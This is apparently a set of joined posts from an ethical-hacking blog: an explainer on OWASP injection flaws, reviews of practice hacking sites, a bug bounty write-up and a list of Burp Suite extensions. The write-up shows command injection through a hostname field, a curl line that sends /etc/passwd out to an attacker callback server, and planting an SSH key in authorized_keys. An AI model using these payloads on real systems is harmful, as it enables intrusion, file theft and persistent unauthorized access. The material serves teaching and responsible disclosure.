I hope you found this content helpful and wish you good luck in your OSCP journey. I encourage you to subscribe to the newsletter and receive an article every Friday to end your week on a hacking content. If you are new to hacking and want to learn the basics, read the OWASP Top 10 theory and hands-on article on thehackerish.com and apply your knowledge on the lab which supports them. If you enjoy learning with videos, I invite you to watch the OWASP Top 10 Youtube playlist.

OWASP Top 10 vulnerabilities: Injection explained

Hello and welcome to this OWASP Top 10 vulnerabilities course. Today’s blog post is about Injection. 

By the end of this post, you will have understood the following points:

  • What is OWASP Top 10 Injection? 
  • Why Injection is on the top of the OWASP Top 10 vulnerabilities?
  • What is the difference between error and blind-based injection? 
  • OWASP Top 10 Injection flaws.
  • How to exploit Injection?
  • Some real-world Injection attacks
  • OWASP Top 10 Injection prevention 

What is Injection and why it ranks top of OWASP Top 10 vulnerabilities?

Injection sits comfortably on the top of the OWASP TOP 10 vulnerabilities for the last decade. This is for a good reason. In fact, injection is a broad class of vulnerabilities that you can find on pretty much any target. Let’s take the definition of the OWASP Top 10 for injection and analyze it:

Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or a query. The attacker’s hostile data can trick the interpreter into performing unintended actions.

I highlighted the key ideas in italic. The first thing to notice is that injection is not specific to a technology. In fact, any feature which expects and processes input is potentially vulnerable to injection. 

The second thing to point out is how large the attack surface is. Tell me how many features you encountered which fall under this very scenario! I’d say most of them. In fact, even a simple search feature on a website takes your input, uses it as part of a command, queries a data store and returns the results to you.

Continuing on the example above, a malicious user can inject a malicious input, called the payload, to perform unintended results by the vulnerable system. If successful, the malicious user can trick the application into returning sensitive information, modify data or delete it altogether.

Error based injection vs blind Injection vulnerabilities

When hunting for Injection vulnerabilities, you will typically encounter two use cases. On the one hand, the application can return error messages which your payload triggered. In this case, you can follow the application errors for what to do next. For example, you can inject a malformed SQL query as simple as a quote and you get the following error:

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'WHERE id=''' at line 1". 

This tells you a lot! First, you have successfully found a SQL injection. Second, the database engine is MySQL. Third, the application tells you the exact vulnerable part of the SQL query. Lastly, you’ve got a solid bug to report if you are a bug bounty hunter.

On the other hand, you don’t have direct and naive feedback from the application, but rather a hint, or nothing at all! In this case, we call it a blind injection. It requires more effort, but it’s still possible to exploit it as you can see in the OWASP Top 10 training injection blog post.

Now that you have a general understanding, let’s dive into some instances of OWASP Top 10 Injection flaws.

OWASP Top 10 Injection flaws

There are many subsets of the OWASP Top 10 Injection vulnerability class. Below you find most of them. The list is growing, so make sure to subscribe to the newsletter below so that you get a notification each Friday about new content.

SQL injection

SQL injection is a flaw in the way user data is being handled inside a SQL query. Basically, a developer concatenates the expected input directly into the SQL query. SQL injection is one of the most impactful vulnerabilities that exist, it can affect the confidentiality, integrity and availability. To learn more about SQL injection, feel free to read this in-depth SQL injection tutorial.

OS Command injection

OS command injection is a flaw in the way user data is being handled inside an operating system command. Basically, a developer insecurely puts the expected input directly into the OS command. OS injection is one of the deadliest vulnerabilities that exist in the realm of security vulnerabilities. It allows an attacker to have a remote shell on your vulnerable server. As of its impact, it can affect the confidentiality, integrity and availability. If you want to see a real example, read my write-up about how I found and exploited one.

LDAP injection

This injection is a flaw in the way user input is being handled inside an LDAP query. LDAP stands for Lightweight Directory Access Protocol. It is an client-server open industry standard which can be used to access and maintain directory information services. For example, it can be used to authenticate a user, search items, modify entries, etc. Therefore, this type of injection impacts the confidentiality, integrity and availability. You will learn more about LDAP injection in the upcoming blog posts.

OWASP Top 10 Injection attacks

The following are real-world breaches which exploited one of the injections discussed above.

SQL injection in Magento, patch published on March 2019

On its release, Magento urges its users to upgrade to the latest version of Magento. One of the severe vulnerabilities patched was a SQL injection.

CVE-2018-1111 – DHCP Client Script Code Execution Vulnerability

On its advisory on May 2018, RedHat announced that Red Hat Enterprise Linux 6 and 7 are vulnerable to a command injection flaw found in a script included in the DHCP client.

SQL injection against TalkTalk

The breach that affected TalkTalk exploited a SQL injection. Over 4 Million customers were at risk. More than 150K customers’ data was compromised and the company was fined 400K pounds.

OWASP Top ten Injection prevention

Since Injection flaws reside in the way user inputs are handled, a developer should never trust any input. If you do, you’re exposing your asset to security risks which can be damaging. For each of the OWASP Top 10 Injection vulnerabilities discussed earlier, there is a section on how to prevent them. But in general, this OWASP Cheat Sheet covers the guidelines you need to follow when writing your code. The main ideas are as follows.

  • Perform proper input validation: You should sanitize and normalize your input.
  • Use a safe API: For example, using an ORM is far better and secure than building SQL queries yourself.
  • Properly escape your input: If you don’t have an API available, make sure to escape special characters according to the interpreter that will handle your command or query.

That’s it for today, in the next episodes of this OWASP Top 10 vulnerabilities tutorial, we will discuss OWASP Top 10 broken authentication. Stay tuned!

Best hacking websites for ethical hackers

I often get asked from many of my friends and colleagues about where should I start to learn to hack. My answer always includes a handful of hacking websites which I found very useful during my journey in this awesome industry. Today I will share with you the best hacking websites you should definitely use.

For those who stumbled upon this blog for the first time, it is dedicated to helping you learn and become a better ethical hacker, the topics cover web application hacking, penetration testing and bug bounty hunting.

Why are hacking websites important?

I always say that you can’t learn hacking without practice. Unfortunately, you can’t practice by hacking arbitrary websites because it is unethical and illegal, to say the least. You could develop your own web applications and then hack them, but that would take a lot of time and effort especially if you are not a developer. This is where hacking websites come into play. In fact, they offer a practical playground ready to be hacked by everyone. If you want to focus on learning a specific vulnerability, you can solve the corresponding challenges. Alternatively, if you want to hack a machine from the start and become root, you can play boot2root challenges. You can even participate in live Capture The Flag challenges, either alone or with a team, and play against other teams. This offers a tremendous opportunity for you not only to learn hacking but also to sharpen your skills and keep them up to date.

How to learn from hacking websites?

Some hacking websites offer challenges without solutions. You might think that this is not practical, but it’s the best way for you to learn. In fact, rushing into the solution without putting in enough effort will not benefit you in any way. When you take your time to understand the problem and solve it on your own, you will never forget it! Besides, real-life hacking involves so many rabbit holes, long hours trying to understand and exploit security vulnerabilities. So, you will be learning while preparing yourself for your future real targets.

Google Gruyere: A hacking website from Google

Google gruyere is a deliberately vulnerable web application that you can hack to learn about many security vulnerabilities. It is available online, which means that you don’t need any lab setup. It includes well-known issues like Cross-Site Scripting, Command Injection and CSRF. Additionally, you can also download the source code to inspect it and perform white-box testing.

Google gruyere is great for beginners because it explains each vulnerability at a time with a corresponding challenge. If you feel blocked, you can show the collapsed hints. Even though it also includes the solution, I don’t recommend you see it.

Google Gruyere: A hacking website from Google

Pros

  • Easy to use.
  • Great explanations.
  • Very useful for absolute beginners.

Cons

A limited number of vulnerabilities.

Vulnhub: The best hacking website for local boot2root machines

If you have a slow connection and you want to eliminate network latency when you are doing ethical hacking, then VulnHub is your friend. In fact, it is a hacking website which collects virtual machines that you can download one time and install locally on your host using virtualization software such as VirtualBox or VMWare. VulnHub offers so many machines in all difficulty levels. In such scenarios, you boot the virtual machine and your goal is to become root. This is known as a boot2root challenge.

For each machine, there is usually a publicly available solution, but I don’t recommend you read it until you exhaust all the ideas you have in mind. Unfortunately, there are no hints and no forum to exchange ideas between the community members.

Hacking website VulnHub.com: ne of the many VM machine that it offers you to hack
Hacking website VulnHub.com: ne of the many VM machine that it offers you to hack

Pros

  • Offline hacking eliminates network latency.
  • A large choice of Virtual Machines to choose from.

Cons

  • There is no forum.
  • Sometimes, you need to troubleshoot some networking issues when the VM is not reachable from your host machine.

Root me: My old favourite hacking website

Root-me.org is a mature hacking platform that you can use to practice ethical hacking. It is much more than just a simple hacking website. In fact, it offers challenges in many areas, such as web, cryptography, cracking, networking and more. Besides, it hosts CTF boot2root rooms that you can use to boot and hack a live target to become root. Some of these machines come from VulnHub, which makes it convenient for those who don’t like to set up a personal lab. Furthermore, it has a leaderboard and a strong and live community that you can interact with it using IRC or through the forum. Additionally, it offers professional services for companies which seek employees, hacking training, etc.

This ethical hacking platform provides solutions for the challenges it offers. However, you can’t see one unless you solve the corresponding challenge first. This is a great feature because it encourages you to make an effort on your own. To help you during this tough process, it provides you with related documentation that you can use to understand and solve the challenges on your own. Besides, you can find hints in the forum threads, post a message in the IRC chat, or even contact someone who has already solved the challenge.

Root me: My old favourite hacking website

pros

  • Four languages: English, French, German and Spanish.
  • Diversified challenges.
  • Strong community.

cons

Honestly, I don’t have any. It’s a great platform!

hackthebox: The hacking website for OSCP

After I became top 100 on root-me and rooted a handful of CTF machines, I wanted to tackle challenges similar to the OSCP certification. I Google “OSCP like machines” and I find hackthebox.eu. They offer most of what root-me.org has, with some key differences.

Firstly, you can’t register unless you hack your way in. After you find the flag, you can log in to the platform. It’s not hard to solve that preliminary challenge; it’s just a way to prove that you deserve having an account on this hacking website.

Once I log in, I notice that the user interface is more elegant than the one of root-me.org. I know design taste is a matter of perspective and I don’t really judge a platform by its appearance, but this one just felt professional. On the menu on the left, you can download the VPN file, discover the challenges, the labs, the forum, etc.

hackthebox: The hacking website for OSCP

Accessing this hacking website through the VPN

One of the key differences between root-me and hackthebox is VPN. In fact, to hack the available machines on the latter, you download your connection pack. Then, you connect to the infrastructure with OpenVPN, an open-source software that allows you to connect using VPN. Don’t get scared if this seems new to you; everything is explained on the platform and you just have to follow the steps.

The challenges and boot2root machines

On the one hand, hackthebox offers challenges the same way root-me does, but the number is still way lower. You don’t need a VPN to access the challenges.

On the other hand, hackthebox offers a wide range of boot2root machines. If you want to prepare for your OSCP certification, this is where you should spend most of your time.

In the free plan, you have access to the new ones. Once they retire, you need a paid plan to be able to hack them. As I mentioned earlier, you need to set up a VPN connection to reach them.

The labs

In addition to the awesome boot2root machines, hackthebox offers many hacking labs. These are a couple of machines that compose a full infrastructure. Few of them are accessible directly through the VPN, but most of them require you to obtain a foothold on the infrastructure.

Some of these labs are Active Directory infrastructures developed by hackthebox itself, others are provided by companies which seek ethical hackers to join them. You can find all of them on the menu on the left.

The community

You can join the community and interact with its members through many communication channels, such as the forum, the Discord server and the Mattermost space. You can also send private messages to members and broadcast messages using the shoutbox.

All these communication channels are available on the left menu.

Pros

  • Great quality machines, ideal for OSCP certification preparation.
  • Diversified challenges.

Cons

I honestly don’t see any!

TryHackMe: A new rising hacking website star

This hacking platform is recent. However, it contains exhaustive hacking material in new forms I haven’t seen in any other hacking website.

TryHackMe: A new rising hacking website star

Accessing TryHackMe challenges

As it is the case with hackthebox, this platform also provides a VPN package that you can use to access the hacking challenges. However, only UDP is supported. If you are in a network which blocks UDP, you can’t currently bypass it as you would do with hackthebox.

Hacktivities

These are corners which focus on teaching one thing. For example, if you want to learn the basics of penetration testing, there is a room for that. The same thing for learning how to use Linux and the list goes on. All you have to do is search for the room you want using a filtering system, then enroll and start learning. Some rooms need a paid subscription.

Learning paths

If you are a total beginner in a subject, the learning paths help you cover the basics. These are paid by definition.

King of the Hill

These are CTF challenges like you would see in a typical boot2root scenario, with a key twist! In fact, you can put your name in the file under /root/king.txt to become the king and start gaining points. The players not only exploit the vulnerabilities within the machine, but they also strive to earn the highest score by staying king as long as possible.

The community

You can interact with the community through many communication channels, such as Discord, Twitter, Direct messages, etc.

Pros

  • The rooms and the learning paths are great to learn new subjects.
  • King of the Hill are fun CTFs.
  • The community is live.

Cons

  • The VPN package doesn’t support TCP.

hacker101: The hacking website for bug bounty hunters

I’ve talked this hacking website provides on previous episodes, such as when I talked about my bug bounty methodology. This hacking website provides a solid playground for bug bounty hunters with diversified challenges that will twist your mind. They are designed to mimic the real bugs you would find during bug bounty hunting. Besides, you collect points for each challenge you solve, which allows you to get an invite from a private program on HackerOne. However, it doesn’t only provide hacking challenges. In my opinion, there are two other resources you can learn from besides the hacking challenges.

The first one is the Discord server where you can connect and engage with the bug bounty community members.

The second resource I want to draw your attention to is the introductory videos that explain many subjects that relate to bug bounty hunting. Things like web vulnerabilities and mobile hacking.

Pros

  • Great videos resources for future bug bounty hunters
  • The challenges are unique and similar to what you would find during bug bounty hunting.
  • Vibrant bug bounty community in the Discord server.

Cons

The hacking content and the features are still quite limited compared to other hacking platforms.

Which one of these hacking websites to choose?

You might have started to feel overwhelmed with all these hacking websites and platforms. I hear you wondering where should I start? And do I have to subscribe and use all of them?

The answer is no! While each hacking website and platform brings its unique features and user experience, all of them share the same core building blocks, which are hands-on challenges. As the number of such resources contains to grow, you just have to choose one or two which suit your taste and needs. Occasionally, you may experiment with new rising hacking websites and platforms, which might replace your current ones.

I started my hacking journey when the major hacking websites I had were VulnHub and Root-me around. Once I discovered hackthebox, I got addicted to their machines, especially since I was preparing my OSCP certification. Lately, I came across tryhackme, which offered a great gamification experience on top of the practical hacking content.

Conclusion

In this article, I tried to collect the best hacking websites and platforms that will surely help you in your hacking career. Whether you are an absolute beginner or an advanced ethical hacker, I’m sure you will find a match.

However, this is not a complete list. There are other hacking websites like OWASP WebGoat and OWASP JuiceShop, which I have used as a hacking lab for the OWASP Top 10 training. Then, there is Portswigger Academy which I already covered in a previous episode. And finally, there is the classic CTFtime, which is dedicated to Capture the Flag events.

Bug bounty write-up: From SSRF to $4000

Hello ethical hackers and bug bounty hunters! Welcome to this bug bounty write-up where I show you how I found a Server-Side Request Forgery vulnerability (SSRF). Then, I will explain how I was able to escalate it to obtain a Remote Code Execution (RCE). Finally, you will see how it is possible to gain a full SSH shell on the vulnerable server.

If all this seems intimidating for you, let me tell you that you shouldn’t be; just make sure you stick with me until the end. I promise you are going to learn many things today!

What app is this bug bounty write-up targeting?

Before diving into the details, let’s understand what the application does.

Simply put, the web application I hacked is a file-sharing system that allows users to securely exchange files. It also has an administrative panel dedicated to the administrators for management purposes. They can create users, configure internal servers and networks, etc.

To honour the responsible disclosure policy, I will not tell the name of this application. However, this does not affect what you will be learning. You can definitely apply these tips and tricks on the bug bounty programs or the penetration testing projects you are working on.

Bug bounty write-up phase 1: Enumeration

The first phase of any security testing is Enumeration. In my bug bounty methodology, I explained what are the key questions you need to answer during this phase.

In the context of this application, I focused on the administration panel since it contained many interesting features. One of them is the possibility to configure a migration server. This feature has a multi-stage wizard.

Whenever I see a complex feature, I tend to put it at the top of the list since the developers will likely make more mistakes. And this particular case was no different!

In fact, during one of the many configuration steps, the application asks for the IP address or the hostname of the migration server. For me, I started hearing inner-voices screaming: SSRF! SSRF! SSRF!

Bug bounty write-up phase 2: Exploiting the SSRF

Wait…What is SSRF in the first place?

SSRF stands for Server-Side Request Forgery. It is a security vulnerability which happens if you can meet two conditions:

  1. The application initiates a request to a target server.
  2. You control part or all of the target server through user input.

SSRF can be handy to pivot inside the IT infrastructure of your target. This is possible because the vulnerable server generally runs next to neighbour systems which are not directly accessible. You can see this in action when I demonstrate how I accessed the APK file during the Hackerone H1-2006 CTF challenge write-up.

Exploiting the SSRF

In the case of this web application, I simply put my web server’s hostname in the migration server’s input field. Upon hitting the Next button, I received an HTTP callback. This means that the application takes the hostname input and initiates an HTTP request to a server of my choice.

What is the impact?

Receiving a callback is not necessarily a security issue unless the server discloses sensitive data in the request. You must test if you can reach internal assets. In other words, you should be able to access services which are not directly exposed. Unfortunately, many bug bounty hunters fall for this mistake and their reports get closed as Not Applicable to Informative.

In the case of this web application, I get different error messages depending on whether there is a service running or not, but that’s all about it! I can’t interact with those services. Therefore, this SSRF is not impactful enough.

But wait! Maybe I can run arbitrary commands and exfiltrate the results in the callback.

Escalating to Remote Code Execution (RCE)

This time, instead of using my domain as a callback, I injected an operating system (OS) command as part of the callback subdomain. Technically, I used the payload “whoami.mycallback.server. Consequently, I got an HTTP request callback to uzer.mycallback.server !

If you don’t understand the above payload, here is what’s happening:

  1. The whoami runs the command whoami. This is possible thanks to the back-ticks around it. In this case, the command returns uzer .
  2. The server sends an HTTP callback request to my server while disclosing the result of the OS command in the subdomain part.

This is clear proof that I can successfully run OS commands on the vulnerable server, which is all good, but can I run arbitrary commands?

Bug bounty write-up bonus: Getting a full shell

While the proof-of-concept (POC) that I have so far demonstrates impact, I wanted to be sure I’m getting the full bug bounty. To do that, I needed to prove that I can run arbitrary commands, not just single-word commands like whoami.

To achieve this, I needed to read and write files. You will understand why shortly, but for now, let’s see how we can fulfil those two requirements.

Reading internal files

Instead of using whomai, I run curl -F ‘@/etc/passwd mycallback.server’.mycallback.server. Therefore, I exfiltrated the content of the file /etc/passwd in the POST data which I receive back on mycallback.server.

Although I was using a mal-formatted hostname syntax in my payload, I still could run the OS command since the server evaluates it before anything else.

bug bounty write-up: reading arbitrary files
bug bounty write-up: reading arbitrary files

Writing to internal files

To demonstrate the ability to create and edit the server’s files, I run echo test | tee /tmp/POC. Then, I fetched its content using the same technique I used to read the /etc/passwd file.

Finally, getting the SSH shell

Because the server is running a publicly accessible SSH server, what if I could log into it without any need for a password?

To achieve this, the steps are as follow:

  1. Generate a key pair using the command ssh-keygen on my attacking machine.
  2. Append the public key to the file /home/uzer/.ssh/authorized_keys on the vulnerable server using the same technique I used earlier to write the file /tmp/POC.
  3. Log into the SSH server using my private key and the user uzer using ssh -i private.key uzer@vulnerable.server .

As a result of this clear and precise impact, the team quickly triaged my report and awarded me with the highest bounty.

Bug bounty write-up: Getting the reward
Bug bounty write-up: Getting the reward

Conclusion

Chaining vulnerabilities can be devastating. In this bug bounty write-up, you learned how to combine both SSRF and Command injection to achieve Remote Code Execution on the vulnerable server. Besides, you learned how to gain a stable shell by leveraging the exposed SSH server. Finally, you learned that it’s important to demonstrate a clear impact if you want to receive the highest bounty.

I hope you enjoyed reading this article as much as I enjoyed writing it. Until the next episode, stay curious, keep learning and go find some bugs.

Top 10 Burp Suite extensions to use in bug bounty hunting

Hello ethical hackers and bug bounty hunters. Today, you will learn the top 10 Burp Suite extensions I found myself using over and over again. They assist me in different areas, such as pretty-printing data, actively testing for specific vulnerability classes, parsing API definitions and brute-forcing.

Wsdler is your burp extension for SOAP

During your penetration testing or bug bounty hunting, you might encounter SOAP-based APIs. They are web services that you can consume according to a file which describes the actions they expose and how to call them. This file is based on the Web Services Description Language (WSDL).

Whenever you find one, you can parse it using Wsdler. Additionally, this Burp extension constructs the HTTP requests as the API expects them.

Wsdler Burp extension showing the HTTP request to send
Wsdler Burp extension showing the HTTP request to send

JSON Beautifier

Before Burp Suite rolled its Pretty button feature, this was the first extension I needed to install after any fresh Burp Suite setup. Nowadays, the majority of web application use RESTful APIs which generally use JSON objects to transfer data between the client and the server. JSON Beautifier prettifies the inline JSON data to make your life easier.

JSON Beautifier burp extension prettifies JSON data
JSON Beautifier burp extension prettifies JSON data

This Burp extension is free and can be used in either Burp Suite Community Edition or Professional.

J2EEScan is a great burp extension for Java EE applications

In my penetration testing assignments, I usually test J2EE web applications, which are Java web applications that support enterprise-level requirements, such as scalability and availability. Therefore, I use J2EEScan to assist me in finding vulnerabilities for the most common CVEs that target J2EE technologies.

The extension adds test cases to the BurpSuite Scanner. Therefore, there no additional configuration after you install it. All you have to do is run a scan and wait for vulnerabilities in the Issue Activity panel in the Burp’s Dashboard tab.

J2EEScan showing a list of issues in Burp Suite issue tracker
J2EEScan showing a list of issues in Burp Suite issue tracker

JSON WEB Tokens, the Burp extension, not the standard

According to jwt.io, JSON Web Token is:

[…] an open standard […] that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed.

JWT token parsed
JWT token parsed

When you do bug bounty hunting or web application penetration testing, it is a pain to manually copy the tokens from Burp Suite and paste them into your favourite parsing tool, such as jwt.io. This extension allows you to parse the token within Burp, the same way JSON Beautifier prettifies inline JSON objects.

SAML Raider

For those of you who don’t know what SAML, it’s a standard used in Single Sign-On (SSO) for authentication. Here is a brief definition from Wikipedia:

Security Assertion Markup Language (SAML) […] is an open standard for exchanging authentication and authorization data between parties, in particular, between an identity provider and a service provider. SAML is an XML-based markup language for security assertions.

Since SAML requests contain long base64 encoded XML data, it is impractical to manually parse them. SAML Raider automatically performs the parsing within Burp Suite. Additionally, you can use it to perform known attacks against your target web application. In fact, it comes with pre-configured exploitation techniques, such as signature wrapping, that you can easily run to test for weaknesses in SAML implementations.

SAML request parsed
SAML request parsed

AuthMatrix burp extension for broken access control

I’ve already covered this great extension in a Youtube video. It allows you to test for broken access control vulnerabilities, such as IDOR, unprotected endpoints, etc. The flow is fairly simple. Firstly, you browse your target application and send any interesting requests to this extension. Then, you create the target users, such as the attacker and the victim. Then, for each user, you configure the session cookies, and any HTTP headers containing tokens such as JWT or API keys. Lastly, you hit the run button and let AuthMatrix highlight the suspicious requests in red.

All requests are protected against broken access control
All requests are protected against broken access control

HTTP request smuggler

This is the go-to Burp extension when you want to easily detect and exploit a web application through HTTP Request Smuggling.

It detects whether you have a CL.TE or TE.CL condition and reports it directly into Burp Suite’s Dashboard tab, under the Issue Activity menu where all the issues get listed.

If you have no clue about what do CL.TE and TE.CL means, I invite you to read this article from the authors of Burp Suite.

Turbo Intruder

This extension allows you to send large numbers of HTTP requests to a target web application. If you have Burp Community, you know that you can only work with a limited version of the Intruder which does not support multiple threads. Instead, you can use Turbo Intruder.

Since this Burp extension uses a Python snippet that you can edit, I recommend you get familiar with the basics of the Python programming language. That way, you can customize Turbo Intruder to bring more flexibility when you brute force.

Upload Scanner

Whenever you encounter a file upload feature that uses the multipart mime type, I encourage you to give this Burp extension a try. In fact, you can use it to probe the upload features for many security issues.

It fuzzes all the parameters using a set of organized categories that you can choose from. If the application retrieves the uploads, you can configure Upload Scanner to fetch the files to verify cases like XSS.

There are plenty of other features in this awesome Burp extension. I encourage you to learn more about it. Additionally, I prepared this Youtube video to show you how it works.

Java Deserialization Scanner

This Burp extension checks for insecure deserialization issues in Java applications. It uses pre-built serialized java objects to probe the application for a callback. You can configure this feedback to be either a time delay or a callback. If the application sleeps for some time before responding, or if you receive a hit as a callback, the extension highlights exactly what payload has triggered it. Therefore, you can prepare your own payload using tools such as ysoserial.

If you want to learn how insecure deserialization works and how to exploit it with real examples, I invite you to read this article.

Conclusion

There are so many tools, extensions and methodologies available a few clicks away. However, I should mention that you don’t have to use them all. Take some time to discover how they work, then pick the ones that suit your taste and your needs.

Hopefully, this episode has shown you some new Burp extensions that might help you in your next assignment.

Until the next episode, stay curious, keep learning and go find some bugs!